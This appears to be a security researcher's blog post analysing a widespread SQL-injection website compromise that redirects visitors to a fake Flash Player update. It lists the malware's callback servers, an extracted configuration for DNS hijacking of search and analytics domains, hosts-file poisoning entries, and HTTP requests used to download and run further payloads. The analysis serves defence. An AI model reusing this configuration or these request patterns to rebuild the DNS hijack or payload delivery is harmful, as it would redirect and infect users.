During the last couple of days I have together with Yury Namestnikov been investigating the extremely high numbers of infected websites. It all started when I was going through local statistics for Sweden and saw an increase of 3700% on a certain JavaScript redirector, and also new detections on new variants for Java, PDF and Flash exploits. I published an article about this saying that Sweden was under attack, and you can read the blog post here.
But after some more research I noticed that it was not just Sweden that was affected, it seemed to be a global epidemic. I also noticed that we were talking about two different redirectors; Trojan.JS.Redirector.ro and Trojan.JS.Pakes.cp.
The Schema
So, what is actually happening? The gang behind this is exploiting web applications and injecting HTML code that will load a JavaScript redirector. Exactly what vulnerability they are exploiting is still unclear, but millions of websites are affected by this attack. What we know is that they are injecting the code via an SQL injection, but whether the vulnerability is poorly configured servers, or a zero-day vulnerability is still unclear. The JavaScript which the injected HTML code is loading looks like the following:
In the next step, the victims are redirected to a server which validates the origin (country) of the victim. Depending on the location a malicious payload is executed. In one example that we have seen, users are redirected to a malicious website posing as a YouTube video, that tries to get the user to download an update to Flash Player, which is actually malware.
The technical setup is almost identical to the Lizamoon case we read about a few months back. Same filenames, same techniques and also the server setups looks very identical.
Malware analysis(ongoing!)
If the victim downloads and executes the fake flash update, it will upon execution connect back to the following servers:
- 209.212.147.141/chrome/report.html
- 98.142.243.64/chrome/report.html
- 65.98.83.115/?19= (Virtual Host: update.19runs10q3.com)
Upon execution the malware will modify the hosts file and “poison” known domains. It will make the infected computer use rogue DNS servers, and redirect the users to malicious websites. The following configuration file has been extracted from the malware:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 |
[redirected_dns] -affiliate=9; -DnsServerIp=66.197.152.72; -DnsServerIp=75.102.22.72; -DnsServerIp=205.234.236.192; -FakeDnsServerIp=66.197.152.71; -FakeDnsServerIp=75.102.22.71; -FakeDnsServerIp=205.234.236.191; [redirect_timeouts] -response_timeout=40000; -redirect_deactivating_interval=40020; [reports] -Version=260; -host=98.142.243.64/chrome/report.html; -host_first=209.212.147.141/chrome/report.html; -check_timeout=10000; -disable_reports=0; [AntiRB] -server=65.98.83.115; [GUI] -long_start=0; [UAC] -DelayBeforeRun=10; [redirected_ips] [redirected_domains] -www.google.com.=87.125.87.99; -google.com.=87.125.87.103; -google.com.au.=87.125.87.104; -www.google.com.au.=87.125.87.147; -google.be.=77.125.87.148; -www.google.be.=77.125.87.149; -google.com.br.=77.125.87.109; -www.google.com.br.=77.125.87.150; -google.ca.=77.125.87.152; -www.google.ca.=77.125.87.153; -google.ch.=77.125.87.155; -www.google.ch.=77.125.87.158; -google.de.=77.125.87.160; -www.google.de.=77.125.87.161; -google.dk.=92.125.87.123; -www.google.dk.=92.125.87.160; -google.fr.=92.125.87.154; -www.google.fr.=92.125.87.134; -google.ie.=92.125.87.170; -www.google.ie.=92.125.87.177; -google.it.=92.125.87.173; -www.google.it.=92.125.87.147; -google.co.jp.=92.125.87.103; -www.google.co.jp.=84.125.87.147; -google.nl.=84.125.87.103; -www.google.nl.=84.125.87.147; -google.no.=84.125.87.103; -www.google.no.=84.125.87.147; -google.co.nz.=84.125.87.103; -www.google.co.nz.=84.125.87.147; -google.pl.=84.125.87.103; -www.google.pl.=64.125.87.147; -google.se.=64.125.87.103; -www.google.se.=64.125.87.147; -google.co.uk.=64.125.87.103; -www.google.co.uk.=64.125.87.147; -google.co.za.=64.125.87.103; -www.google.co.za.=64.125.87.147; -www.google-analytics.com.=64.125.87.101; -www.bing.com.=92.123.68.97; -search.yahoo.com.=72.30.186.249; -www.search.yahoo.com.=72.30.186.249; -uk.search.yahoo.com.=87.248.112.8; -ca.search.yahoo.com.=100.6.239.84; -de.search.yahoo.com.=87.248.112.8; -fr.search.yahoo.com.=87.248.112.8; -au.search.yahoo.com.=87.248.112.8; -ad-emea.doubleclick.net.=64.125.87.101; -www.statcounter.com.=64.125.87.101; [redirected_domains_hosts] -www.google-analytics.com.=64.125.87.101; -ad-emea.doubleclick.net.=64.125.87.101; -www.statcounter.com.=64.125.87.101; |
The malware will then changes the DNS configuration by modifying the hosts file to poison the following hostnames:
- 74.55.76.230 www.google-analytics.com.
- 74.55.76.230 ad-emea.doubleclick.net.
- 74.55.76.230 www.statcounter.com.
Additional will the malware download and excecute updates. Some of the following requests have been collected:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
v=spf1 a mx ip4:%d.%d.%d.%d/%d ?all /?controller=hash HTTP/1.1 Host: update1.randomstring.com User-Agent: IE7 /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3 HTTP/1.1 Host: update1.randomstring.com User-Agent: IE7 HTTP/1.1 /update_c1eec.exe Host: update1.randomstring.com User-Agent: IE7 /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3 HTTP/1.1 Host: update1.randomstring.com |
We are also seeing a very high increase in Java, PDF and Flash exploits in the wild, but we are still unsure if this attack is also responsible for exploiting victims exposed to these vulnerabilities. But in all countries mentioned in the statistics, these exploits have dramatically increased in September and October. As soon as i have information i will publish it.
Ongoing analysis of the web infection